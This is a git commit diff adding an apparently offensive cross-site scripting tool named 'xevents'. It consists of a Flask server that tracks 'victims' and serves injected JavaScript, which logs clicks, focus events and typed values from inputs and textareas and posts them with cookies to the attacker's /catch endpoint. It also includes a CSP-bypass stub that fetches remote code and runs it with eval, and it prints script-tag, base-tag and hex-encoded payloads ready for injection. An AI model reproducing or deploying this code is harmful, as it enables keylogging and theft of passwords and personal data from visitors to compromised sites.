Add files via upload
parent
1054bb8423
commit
c2315c6a9a
|
@ -0,0 +1,12 @@
|
||||||
|
import argparse
|
||||||
|
def parser():
|
||||||
|
parser = argparse.ArgumentParser(description="xevents args")
|
||||||
|
parser.add_argument("-H","--host",default="0.0.0.0",help="ip, default 0.0.0.0")
|
||||||
|
parser.add_argument("-p","--port",default=5000,help="port, default 5000")
|
||||||
|
parser.add_argument("-t","--tags",nargs="+",help="tag list separated by spaces")
|
||||||
|
parser.add_argument("-a","--actions",nargs="+",help="event list separated by spaces")
|
||||||
|
parser.add_argument("-c","--config",default="xevents.json",help="json config file (ignored if tags and events specified)")
|
||||||
|
parser.add_argument("-tu","--tunnel",help="url of tunnel")
|
||||||
|
args = parser.parse_args()
|
||||||
|
args.url = args.tunnel or f"http://{args.host}:{args.port}"
|
||||||
|
return args
|
|
@ -0,0 +1 @@
|
||||||
|
fetch('%url%/p',{credentials: 'include'}).then(response=>response.text()).then(text=>{eval(text)})
|
|
@ -0,0 +1,24 @@
|
||||||
|
const url = '{{url}}';
|
||||||
|
const tags = ["{{tags|join('","')}}"];
|
||||||
|
const actions = ["{{actions|join('","')}}"];
|
||||||
|
|
||||||
|
|
||||||
|
function actionLog(inp){
|
||||||
|
actions.forEach(action => {
|
||||||
|
inp.addEventListener(action,function(e){
|
||||||
|
const jsondata={"location":window.location.href,"name":inp.name,"id":inp.id,"class":inp.className,"type":inp.type,"tag":inp.tagName,"action":action,"value":inp.value}
|
||||||
|
fetch(url,{
|
||||||
|
method: 'POST',
|
||||||
|
credentials: 'include',
|
||||||
|
headers: {
|
||||||
|
'Content-Type': 'application/json'
|
||||||
|
},
|
||||||
|
body: JSON.stringify(jsondata)
|
||||||
|
});
|
||||||
|
})
|
||||||
|
})};
|
||||||
|
|
||||||
|
tags.forEach(tag => {
|
||||||
|
let inputs=Array.from(document.getElementsByTagName(tag));
|
||||||
|
inputs.forEach(actionLog);
|
||||||
|
})
|
|
@ -0,0 +1 @@
|
||||||
|
{"tags":["input","textarea","button"],"actions":["click","focusout","focus","copy","input"]}
|
|
@ -0,0 +1,106 @@
|
||||||
|
#imports
|
||||||
|
from flask import Flask, render_template, request, redirect, make_response, session
|
||||||
|
from flask_cors import CORS
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import secrets
|
||||||
|
from colorama import Fore, Back, Style
|
||||||
|
import lib.parse
|
||||||
|
from os import path
|
||||||
|
|
||||||
|
app = Flask(__name__)
|
||||||
|
|
||||||
|
#secret key for sessions generated at runtime
|
||||||
|
app.secret_key = secrets.token_urlsafe(16)
|
||||||
|
|
||||||
|
#configure cross origin credential support for victim tracking
|
||||||
|
CORS(app, supports_credentials=True)
|
||||||
|
|
||||||
|
#remove flasks default logging
|
||||||
|
log = logging.getLogger('werkzeug')
|
||||||
|
log.disabled = True
|
||||||
|
|
||||||
|
#simple array of xeventsIDs to keep track of victim number
|
||||||
|
sessions=[]
|
||||||
|
|
||||||
|
#handle base tag injection
|
||||||
|
@app.before_request
|
||||||
|
def prior():
|
||||||
|
if request.path.endswith(".js"):
|
||||||
|
return payload()
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
#return the payload
|
||||||
|
@app.route("/p")
|
||||||
|
def payload():
|
||||||
|
|
||||||
|
#assign victim ID
|
||||||
|
if "xeventsID" not in session:
|
||||||
|
session["xeventsID"]=secrets.token_urlsafe(16)
|
||||||
|
sessions.append(session["xeventsID"])
|
||||||
|
|
||||||
|
#read tags and actions from config
|
||||||
|
if args.tags and args.actions:
|
||||||
|
tags=args.tags
|
||||||
|
actions=args.actions
|
||||||
|
else:
|
||||||
|
with open(args.config,"r") as xeventsconfigfile:
|
||||||
|
xeventsconfig=json.loads(xeventsconfigfile.read())
|
||||||
|
tags=xeventsconfig["tags"]
|
||||||
|
actions=xeventsconfig["actions"]
|
||||||
|
|
||||||
|
#prepare and issue response
|
||||||
|
resp=make_response(render_template("xevents.js",tags=tags,actions=actions,url=f"{args.url}/catch"))
|
||||||
|
resp.headers["content-type"]="text/javascript"
|
||||||
|
return resp
|
||||||
|
|
||||||
|
#catch json post requests
|
||||||
|
@app.route("/catch",methods=["POST"])
|
||||||
|
def catch():
|
||||||
|
|
||||||
|
#set up variables from request json
|
||||||
|
rj=request.json
|
||||||
|
action=rj["action"]
|
||||||
|
tag=rj["tag"]
|
||||||
|
location=rj["location"]
|
||||||
|
del rj["action"]
|
||||||
|
del rj["tag"]
|
||||||
|
del rj["location"]
|
||||||
|
#current victim id
|
||||||
|
victim=session["xeventsID"]
|
||||||
|
|
||||||
|
#display results
|
||||||
|
print(f"{tag} tag recieved {Fore.CYAN}{action}{Style.RESET_ALL} event from {Fore.RED}victim {sessions.index(victim)}{Style.RESET_ALL} on {Fore.GREEN}{location}{Style.RESET_ALL}")
|
||||||
|
for key,value in zip(rj.keys(),rj.values()):
|
||||||
|
if value:
|
||||||
|
print(f"\t{key}:{value}")
|
||||||
|
print("\n")
|
||||||
|
return ""
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
args=lib.parse.parser()
|
||||||
|
print(f"{Fore.RED}inject as script tag: {Style.RESET_ALL}")
|
||||||
|
print(f"{args.url}/p\n")
|
||||||
|
|
||||||
|
print(f"{Fore.RED}inject as base tag: {Style.RESET_ALL}")
|
||||||
|
print(args.url)
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
with open(path.join("templates","cspbypass.js"),"r") as cspbyp:
|
||||||
|
payload=cspbyp.read().replace("%url%",args.url)
|
||||||
|
encoded="".join(["\\x%x" %ord(char) for char in payload])
|
||||||
|
encoded=f"Function(\"{encoded}\")()"
|
||||||
|
payload=f"Function(\"{payload}\")()"
|
||||||
|
|
||||||
|
|
||||||
|
print(f"{Fore.RED}csp src self bypass: {Style.RESET_ALL}")
|
||||||
|
print(payload)
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
print(f"{Fore.RED}csp src self bypass + hex encoding: {Style.RESET_ALL}")
|
||||||
|
print(encoded)
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
app.run(args.host,args.port)
|
Loading…
Reference in New Issue